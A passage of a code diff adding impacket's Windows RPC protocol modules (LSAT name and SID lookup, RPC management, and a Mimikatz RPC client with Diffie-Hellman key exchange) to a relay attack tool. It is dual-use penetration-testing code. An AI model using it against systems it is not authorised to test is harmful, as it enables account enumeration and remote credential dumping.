+    request.fields['InterfaceName'].fields['MaximumCount'] = 256
+
+    return dce.request(request)
+
+def hIpTransitionDeletev6Inv4Tunnel(dce, tunnel_guid):
+    request = IpTransitionDeletev6Inv4Tunnel()
+    request['TunnelGuid'] = uuid.string_to_bin(tunnel_guid)
+
+    return dce.request(request)

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/lsat.py

@@ -0,0 +1,494 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-LSAT] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket import nt_errors
+from impacket.dcerpc.v5.dtypes import ULONG, LONG, PRPC_SID, RPC_UNICODE_STRING, LPWSTR, PRPC_UNICODE_STRING, NTSTATUS, \
+    NULL
+from impacket.dcerpc.v5.enum import Enum
+from impacket.dcerpc.v5.lsad import LSAPR_HANDLE, PLSAPR_TRUST_INFORMATION_ARRAY
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRENUM, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.dcerpc.v5.samr import SID_NAME_USE
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_LSAT  = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AB','0.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in nt_errors.ERROR_MESSAGES:
+            error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] 
+            return 'LSAT SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'LSAT SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.10 ACCESS_MASK
+POLICY_LOOKUP_NAMES             = 0x00000800
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.12 LSAPR_REFERENCED_DOMAIN_LIST
+class LSAPR_REFERENCED_DOMAIN_LIST(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Domains', PLSAPR_TRUST_INFORMATION_ARRAY),
+        ('MaxEntries', ULONG),
+    )
+
+class PLSAPR_REFERENCED_DOMAIN_LIST(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_REFERENCED_DOMAIN_LIST),
+    )
+
+# 2.2.14 LSA_TRANSLATED_SID
+class LSA_TRANSLATED_SID(NDRSTRUCT):
+    structure = (
+        ('Use', SID_NAME_USE),
+        ('RelativeId', ULONG),
+        ('DomainIndex', LONG),
+    )
+
+# 2.2.15 LSAPR_TRANSLATED_SIDS
+class LSA_TRANSLATED_SID_ARRAY(NDRUniConformantArray):
+    item = LSA_TRANSLATED_SID
+
+class PLSA_TRANSLATED_SID_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSA_TRANSLATED_SID_ARRAY),
+    )
+
+class LSAPR_TRANSLATED_SIDS(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Sids', PLSA_TRANSLATED_SID_ARRAY),
+    )
+
+# 2.2.16 LSAP_LOOKUP_LEVEL
+class LSAP_LOOKUP_LEVEL(NDRENUM):
+    class enumItems(Enum):
+        LsapLookupWksta                = 1
+        LsapLookupPDC                  = 2
+        LsapLookupTDL                  = 3
+        LsapLookupGC                   = 4
+        LsapLookupXForestReferral      = 5
+        LsapLookupXForestResolve       = 6
+        LsapLookupRODCReferralToFullDC = 7
+
+# 2.2.17 LSAPR_SID_INFORMATION
+class LSAPR_SID_INFORMATION(NDRSTRUCT):
+    structure = (
+        ('Sid', PRPC_SID),
+    )
+
+# 2.2.18 LSAPR_SID_ENUM_BUFFER
+class LSAPR_SID_INFORMATION_ARRAY(NDRUniConformantArray):
+    item = LSAPR_SID_INFORMATION
+
+class PLSAPR_SID_INFORMATION_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_SID_INFORMATION_ARRAY),
+    )
+
+class LSAPR_SID_ENUM_BUFFER(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('SidInfo', PLSAPR_SID_INFORMATION_ARRAY),
+    )
+
+# 2.2.19 LSAPR_TRANSLATED_NAME
+class LSAPR_TRANSLATED_NAME(NDRSTRUCT):
+    structure = (
+        ('Use', SID_NAME_USE),
+        ('Name', RPC_UNICODE_STRING),
+        ('DomainIndex', LONG),
+    )
+
+# 2.2.20 LSAPR_TRANSLATED_NAMES
+class LSAPR_TRANSLATED_NAME_ARRAY(NDRUniConformantArray):
+    item = LSAPR_TRANSLATED_NAME
+
+class PLSAPR_TRANSLATED_NAME_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_TRANSLATED_NAME_ARRAY),
+    )
+
+class LSAPR_TRANSLATED_NAMES(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Names', PLSAPR_TRANSLATED_NAME_ARRAY),
+    )
+
+# 2.2.21 LSAPR_TRANSLATED_NAME_EX
+class LSAPR_TRANSLATED_NAME_EX(NDRSTRUCT):
+    structure = (
+        ('Use', SID_NAME_USE),
+        ('Name', RPC_UNICODE_STRING),
+        ('DomainIndex', LONG),
+        ('Flags', ULONG),
+    )
+
+# 2.2.22 LSAPR_TRANSLATED_NAMES_EX
+class LSAPR_TRANSLATED_NAME_EX_ARRAY(NDRUniConformantArray):
+    item = LSAPR_TRANSLATED_NAME_EX
+
+class PLSAPR_TRANSLATED_NAME_EX_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_TRANSLATED_NAME_EX_ARRAY),
+    )
+
+class LSAPR_TRANSLATED_NAMES_EX(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Names', PLSAPR_TRANSLATED_NAME_EX_ARRAY),
+    )
+
+# 2.2.23 LSAPR_TRANSLATED_SID_EX
+class LSAPR_TRANSLATED_SID_EX(NDRSTRUCT):
+    structure = (
+        ('Use', SID_NAME_USE),
+        ('RelativeId', ULONG),
+        ('DomainIndex', LONG),
+        ('Flags', ULONG),
+    )
+
+# 2.2.24 LSAPR_TRANSLATED_SIDS_EX
+class LSAPR_TRANSLATED_SID_EX_ARRAY(NDRUniConformantArray):
+    item = LSAPR_TRANSLATED_SID_EX
+
+class PLSAPR_TRANSLATED_SID_EX_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_TRANSLATED_SID_EX_ARRAY),
+    )
+
+class LSAPR_TRANSLATED_SIDS_EX(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Sids', PLSAPR_TRANSLATED_SID_EX_ARRAY),
+    )
+
+# 2.2.25 LSAPR_TRANSLATED_SID_EX2
+class LSAPR_TRANSLATED_SID_EX2(NDRSTRUCT):
+    structure = (
+        ('Use', SID_NAME_USE),
+        ('Sid', PRPC_SID),
+        ('DomainIndex', LONG),
+        ('Flags', ULONG),
+    )
+
+# 2.2.26 LSAPR_TRANSLATED_SIDS_EX2
+class LSAPR_TRANSLATED_SID_EX2_ARRAY(NDRUniConformantArray):
+    item = LSAPR_TRANSLATED_SID_EX2
+
+class PLSAPR_TRANSLATED_SID_EX2_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_TRANSLATED_SID_EX2_ARRAY),
+    )
+
+class LSAPR_TRANSLATED_SIDS_EX2(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Sids', PLSAPR_TRANSLATED_SID_EX2_ARRAY),
+    )
+
+class RPC_UNICODE_STRING_ARRAY(NDRUniConformantArray):
+    item = RPC_UNICODE_STRING
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.4.4 LsarGetUserName (Opnum 45)
+class LsarGetUserName(NDRCALL):
+    opnum = 45
+    structure = (
+       ('SystemName', LPWSTR),
+       ('UserName', PRPC_UNICODE_STRING),
+       ('DomainName', PRPC_UNICODE_STRING),
+    )
+
+class LsarGetUserNameResponse(NDRCALL):
+    structure = (
+       ('UserName', PRPC_UNICODE_STRING),
+       ('DomainName', PRPC_UNICODE_STRING),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.5 LsarLookupNames4 (Opnum 77)
+class LsarLookupNames4(NDRCALL):
+    opnum = 77
+    structure = (
+       ('Count', ULONG),
+       ('Names', RPC_UNICODE_STRING_ARRAY),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+       ('LookupOptions', ULONG),
+       ('ClientRevision', ULONG),
+    )
+
+class LsarLookupNames4Response(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.6 LsarLookupNames3 (Opnum 68)
+class LsarLookupNames3(NDRCALL):
+    opnum = 68
+    structure = (
+       ('PolicyHandle', LSAPR_HANDLE),
+       ('Count', ULONG),
+       ('Names', RPC_UNICODE_STRING_ARRAY),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+       ('LookupOptions', ULONG),
+       ('ClientRevision', ULONG),
+    )
+
+class LsarLookupNames3Response(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX2),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.7 LsarLookupNames2 (Opnum 58)
+class LsarLookupNames2(NDRCALL):
+    opnum = 58
+    structure = (
+       ('PolicyHandle', LSAPR_HANDLE),
+       ('Count', ULONG),
+       ('Names', RPC_UNICODE_STRING_ARRAY),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+       ('LookupOptions', ULONG),
+       ('ClientRevision', ULONG),
+    )
+
+class LsarLookupNames2Response(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS_EX),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.8 LsarLookupNames (Opnum 14)
+class LsarLookupNames(NDRCALL):
+    opnum = 14
+    structure = (
+       ('PolicyHandle', LSAPR_HANDLE),
+       ('Count', ULONG),
+       ('Names', RPC_UNICODE_STRING_ARRAY),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+    )
+
+class LsarLookupNamesResponse(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedSids', LSAPR_TRANSLATED_SIDS),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.9 LsarLookupSids3 (Opnum 76)
+class LsarLookupSids3(NDRCALL):
+    opnum = 76
+    structure = (
+       ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+       ('LookupOptions', ULONG),
+       ('ClientRevision', ULONG),
+    )
+
+class LsarLookupSids3Response(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.10 LsarLookupSids2 (Opnum 57)
+class LsarLookupSids2(NDRCALL):
+    opnum = 57
+    structure = (
+       ('PolicyHandle', LSAPR_HANDLE),
+       ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+       ('LookupOptions', ULONG),
+       ('ClientRevision', ULONG),
+    )
+
+class LsarLookupSids2Response(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES_EX),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.11 LsarLookupSids (Opnum 15)
+class LsarLookupSids(NDRCALL):
+    opnum = 15
+    structure = (
+       ('PolicyHandle', LSAPR_HANDLE),
+       ('SidEnumBuffer', LSAPR_SID_ENUM_BUFFER),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES),
+       ('LookupLevel', LSAP_LOOKUP_LEVEL),
+       ('MappedCount', ULONG),
+    )
+
+class LsarLookupSidsResponse(NDRCALL):
+    structure = (
+       ('ReferencedDomains', PLSAPR_REFERENCED_DOMAIN_LIST),
+       ('TranslatedNames', LSAPR_TRANSLATED_NAMES),
+       ('MappedCount', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 14 : (LsarLookupNames, LsarLookupNamesResponse),
+ 15 : (LsarLookupSids, LsarLookupSidsResponse),
+ 45 : (LsarGetUserName, LsarGetUserNameResponse),
+ 57 : (LsarLookupSids2, LsarLookupSids2Response),
+ 58 : (LsarLookupNames2, LsarLookupNames2Response),
+ 68 : (LsarLookupNames3, LsarLookupNames3Response),
+ 76 : (LsarLookupSids3, LsarLookupSids3Response),
+ 77 : (LsarLookupNames4, LsarLookupNames4Response),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hLsarGetUserName(dce, userName = NULL, domainName = NULL):
+    request = LsarGetUserName()
+    request['SystemName'] = NULL
+    request['UserName'] = userName
+    request['DomainName'] = domainName
+    return dce.request(request)
+
+def hLsarLookupNames4(dce, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):
+    request = LsarLookupNames4()
+    request['Count'] = len(names)
+    for name in names:
+        itemn = RPC_UNICODE_STRING()
+        itemn['Data'] = name
+        request['Names'].append(itemn)
+    request['TranslatedSids']['Sids'] = NULL
+    request['LookupLevel'] = lookupLevel
+    request['LookupOptions'] = lookupOptions
+    request['ClientRevision'] = clientRevision
+
+    return dce.request(request)
+
+def hLsarLookupNames3(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):
+    request = LsarLookupNames3()
+    request['PolicyHandle'] = policyHandle
+    request['Count'] = len(names)
+    for name in names:
+        itemn = RPC_UNICODE_STRING()
+        itemn['Data'] = name
+        request['Names'].append(itemn)
+    request['TranslatedSids']['Sids'] = NULL
+    request['LookupLevel'] = lookupLevel
+    request['LookupOptions'] = lookupOptions
+    request['ClientRevision'] = clientRevision
+
+    return dce.request(request)
+
+def hLsarLookupNames2(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):
+    request = LsarLookupNames2()
+    request['PolicyHandle'] = policyHandle
+    request['Count'] = len(names)
+    for name in names:
+        itemn = RPC_UNICODE_STRING()
+        itemn['Data'] = name
+        request['Names'].append(itemn)
+    request['TranslatedSids']['Sids'] = NULL
+    request['LookupLevel'] = lookupLevel
+    request['LookupOptions'] = lookupOptions
+    request['ClientRevision'] = clientRevision
+
+    return dce.request(request)
+
+def hLsarLookupNames(dce, policyHandle, names, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta):
+    request = LsarLookupNames()
+    request['PolicyHandle'] = policyHandle
+    request['Count'] = len(names)
+    for name in names:
+        itemn = RPC_UNICODE_STRING()
+        itemn['Data'] = name
+        request['Names'].append(itemn)
+    request['TranslatedSids']['Sids'] = NULL
+    request['LookupLevel'] = lookupLevel
+
+    return dce.request(request)
+
+def hLsarLookupSids2(dce, policyHandle, sids, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta, lookupOptions=0x00000000, clientRevision=0x00000001):
+    request = LsarLookupSids2()
+    request['PolicyHandle'] = policyHandle
+    request['SidEnumBuffer']['Entries'] = len(sids)
+    for sid in sids:
+        itemn = LSAPR_SID_INFORMATION()
+        itemn['Sid'].fromCanonical(sid)
+        request['SidEnumBuffer']['SidInfo'].append(itemn)
+
+    request['TranslatedNames']['Names'] = NULL
+    request['LookupLevel'] = lookupLevel
+    request['LookupOptions'] = lookupOptions
+    request['ClientRevision'] = clientRevision
+
+    return dce.request(request)
+
+def hLsarLookupSids(dce, policyHandle, sids, lookupLevel = LSAP_LOOKUP_LEVEL.LsapLookupWksta):
+    request = LsarLookupSids()
+    request['PolicyHandle'] = policyHandle
+    request['SidEnumBuffer']['Entries'] = len(sids)
+    for sid in sids:
+        itemn = LSAPR_SID_INFORMATION()
+        itemn['Sid'].fromCanonical(sid)
+        request['SidEnumBuffer']['SidInfo'].append(itemn)
+
+    request['TranslatedNames']['Names'] = NULL
+    request['LookupLevel'] = lookupLevel
+
+    return dce.request(request)

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mgmt.py

@@ -0,0 +1,166 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [C706] Remote Management Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray, NDRUniConformantVaryingArray
+from impacket.dcerpc.v5.epm import PRPC_IF_ID
+from impacket.dcerpc.v5.dtypes import ULONG, DWORD_ARRAY, ULONGLONG
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+from impacket import nt_errors
+
+MSRPC_UUID_MGMT  = uuidtup_to_bin(('afa8bd80-7d8a-11c9-bef4-08002b102989','1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in nt_errors.ERROR_MESSAGES:
+            error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] 
+            return 'MGMT SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'MGMT SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+class rpc_if_id_p_t_array(NDRUniConformantArray):
+    item = PRPC_IF_ID
+
+class rpc_if_id_vector_t(NDRSTRUCT):
+    structure = (
+        ('count',ULONG),
+        ('if_id',rpc_if_id_p_t_array),
+    )
+    structure64 = (
+        ('count',ULONGLONG),
+        ('if_id',rpc_if_id_p_t_array),
+    )
+
+class rpc_if_id_vector_p_t(NDRPOINTER):
+    referent = (
+        ('Data', rpc_if_id_vector_t),
+    )
+
+error_status = ULONG
+################################################################################
+# STRUCTURES
+################################################################################
+
+################################################################################
+# RPC CALLS
+################################################################################
+class inq_if_ids(NDRCALL):
+    opnum = 0
+    structure = (
+    )
+
+class inq_if_idsResponse(NDRCALL):
+    structure = (
+       ('if_id_vector', rpc_if_id_vector_p_t),
+       ('status', error_status),
+    )
+
+class inq_stats(NDRCALL):
+    opnum = 1
+    structure = (
+       ('count', ULONG),
+    )
+
+class inq_statsResponse(NDRCALL):
+    structure = (
+       ('count', ULONG),
+       ('statistics', DWORD_ARRAY),
+       ('status', error_status),
+    )
+
+class is_server_listening(NDRCALL):
+    opnum = 2
+    structure = (
+    )
+
+class is_server_listeningResponse(NDRCALL):
+    structure = (
+       ('status', error_status),
+    )
+
+class stop_server_listening(NDRCALL):
+    opnum = 3
+    structure = (
+    )
+
+class stop_server_listeningResponse(NDRCALL):
+    structure = (
+       ('status', error_status),
+    )
+
+class inq_princ_name(NDRCALL):
+    opnum = 4
+    structure = (
+       ('authn_proto', ULONG),
+       ('princ_name_size', ULONG),
+    )
+
+class inq_princ_nameResponse(NDRCALL):
+    structure = (
+       ('princ_name', NDRUniConformantVaryingArray),
+       ('status', error_status),
+    )
+
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (inq_if_ids, inq_if_idsResponse),
+ 1 : (inq_stats, inq_statsResponse),
+ 2 : (is_server_listening, is_server_listeningResponse),
+ 3 : (stop_server_listening, stop_server_listeningResponse),
+ 4 : (inq_princ_name, inq_princ_nameResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hinq_if_ids(dce):
+    request = inq_if_ids()
+    return dce.request(request)
+
+def hinq_stats(dce, count = 4):
+    request = inq_stats()
+    request['count'] = count
+    return dce.request(request)
+
+def his_server_listening(dce):
+    request = is_server_listening()
+    return dce.request(request, checkError=False)
+
+def hstop_server_listening(dce):
+    request = stop_server_listening()
+    return dce.request(request)
+
+def hinq_princ_name(dce, authn_proto=0, princ_name_size=1):
+    request = inq_princ_name()
+    request['authn_proto'] = authn_proto
+    request['princ_name_size'] = princ_name_size
+    return dce.request(request, checkError=False)

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/mimilib.py

@@ -0,0 +1,236 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   Mimikatz Interface implementation, based on @gentilkiwi IDL
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from __future__ import division
+from __future__ import print_function
+import binascii
+import random
+
+from impacket import nt_errors
+from impacket.dcerpc.v5.dtypes import DWORD, ULONG
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+from impacket.structure import Structure
+
+MSRPC_UUID_MIMIKATZ   = uuidtup_to_bin(('17FC11E9-C258-4B8D-8D07-2F4125156244', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in nt_errors.ERROR_MESSAGES:
+            error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] 
+            return 'Mimikatz SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'Mimikatz SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+CALG_DH_EPHEM = 0x0000aa02
+TPUBLICKEYBLOB = 0x6
+CUR_BLOB_VERSION = 0x2
+ALG_ID = DWORD
+CALG_RC4 = 0x6801
+
+################################################################################
+# STRUCTURES
+################################################################################
+class PUBLICKEYSTRUC(Structure):
+    structure = (
+        ('bType','B=0'),
+        ('bVersion','B=0'),
+        ('reserved','<H=0'),
+        ('aiKeyAlg','<L=0'),
+    )
+    def __init__(self, data = None, alignment = 0):
+        Structure.__init__(self,data,alignment)
+        self['bType'] = TPUBLICKEYBLOB
+        self['bVersion'] = CUR_BLOB_VERSION
+        self['aiKeyAlg'] = CALG_DH_EPHEM
+
+class DHPUBKEY(Structure):
+    structure = (
+        ('magic','<L=0'),
+        ('bitlen','<L=0'),
+    )
+    def __init__(self, data = None, alignment = 0):
+        Structure.__init__(self,data,alignment)
+        self['magic'] = 0x31484400
+        self['bitlen'] = 1024
+
+class PUBLICKEYBLOB(Structure):
+    structure = (
+        ('publickeystruc',':', PUBLICKEYSTRUC),
+        ('dhpubkey',':', DHPUBKEY),
+        ('yLen', '_-y','128'),
+        ('y',':'),
+    )
+    def __init__(self, data = None, alignment = 0):
+        Structure.__init__(self,data,alignment)
+        self['publickeystruc'] = PUBLICKEYSTRUC().getData()
+        self['dhpubkey'] = DHPUBKEY().getData()
+
+class MIMI_HANDLE(NDRSTRUCT):
+    structure =  (
+        ('Data','20s=""'),
+    )
+    def getAlignment(self):
+        if self._isNDR64 is True:
+            return 8
+        else:
+            return 4
+
+class BYTE_ARRAY(NDRUniConformantArray):
+    item = 'c'
+
+class PBYTE_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data',BYTE_ARRAY),
+    )
+
+class MIMI_PUBLICKEY(NDRSTRUCT):
+    structure =  (
+        ('sessionType',ALG_ID),
+        ('cbPublicKey',DWORD),
+        ('pbPublicKey',PBYTE_ARRAY),
+    )
+
+class PMIMI_PUBLICKEY(NDRPOINTER):
+    referent = (
+        ('Data',MIMI_PUBLICKEY),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+class MimiBind(NDRCALL):
+    opnum = 0
+    structure = (
+       ('clientPublicKey',MIMI_PUBLICKEY),
+    )
+
+class MimiBindResponse(NDRCALL):
+    structure = (
+       ('serverPublicKey',MIMI_PUBLICKEY),
+       ('phMimi',MIMI_HANDLE),
+       ('ErrorCode',ULONG),
+    )
+
+class MimiUnbind(NDRCALL):
+    opnum = 1
+    structure = (
+       ('phMimi',MIMI_HANDLE),
+    )
+
+class MimiUnbindResponse(NDRCALL):
+    structure = (
+       ('phMimi',MIMI_HANDLE),
+       ('ErrorCode',ULONG),
+    )
+
+class MimiCommand(NDRCALL):
+    opnum = 2
+    structure = (
+        ('phMimi',MIMI_HANDLE),
+        ('szEncCommand',DWORD),
+        ('encCommand',PBYTE_ARRAY),
+    )
+
+class MimiCommandResponse(NDRCALL):
+    structure = (
+       ('szEncResult',DWORD),
+       ('encResult',PBYTE_ARRAY),
+       ('ErrorCode',ULONG),
+    )
+
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (MimiBind, MimiBindResponse),
+ 1 : (MimiUnbind, MimiUnbindResponse),
+ 2 : (MimiCommand, MimiCommandResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+
+class MimiDiffeH:
+    def __init__(self):
+        self.G = 2
+        self.P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
+        self.privateKey = random.getrandbits(1024)
+        #self.privateKey = int('A'*128, base=16)
+
+    def genPublicKey(self):
+        self.publicKey = pow(self.G, self.privateKey, self.P)
+        tmp = hex(self.publicKey)[2:].rstrip('L')
+        if len(tmp) & 1:
+            tmp = '0' + tmp
+        return binascii.unhexlify(tmp)
+
+    def getSharedSecret(self, serverPublicKey):
+        pubKey = int(binascii.hexlify(serverPublicKey), base=16)
+        self.sharedSecret = pow(pubKey, self.privateKey, self.P)
+        tmp = hex(self.sharedSecret)[2:].rstrip('L')
+        if len(tmp) & 1:
+            tmp = '0' + tmp
+        return binascii.unhexlify(tmp)
+
+
+def hMimiBind(dce, clientPublicKey):
+    request = MimiBind()
+    request['clientPublicKey'] = clientPublicKey
+    return dce.request(request)
+
+def hMimiCommand(dce, phMimi, encCommand):
+    request = MimiCommand()
+    request['phMimi'] = phMimi
+    request['szEncCommand'] = len(encCommand)
+    request['encCommand'] = list(encCommand)
+    return dce.request(request)
+
+if __name__ == '__main__':
+    from impacket.winregistry import hexdump
+    alice = MimiDiffeH()
+    alice.G = 5
+    alice.P = 23
+    alice.privateKey = 6
+
+    bob = MimiDiffeH()
+    bob.G = 5
+    bob.P = 23
+    bob.privateKey = 15
+
+    print('Alice pubKey')
+    hexdump(alice.genPublicKey())
+    print('Bob pubKey')
+    hexdump(bob.genPublicKey())
+
+    print('Secret')
+    hexdump(alice.getSharedSecret(bob.genPublicKey()))
+    hexdump(bob.getSharedSecret(alice.genPublicKey()))

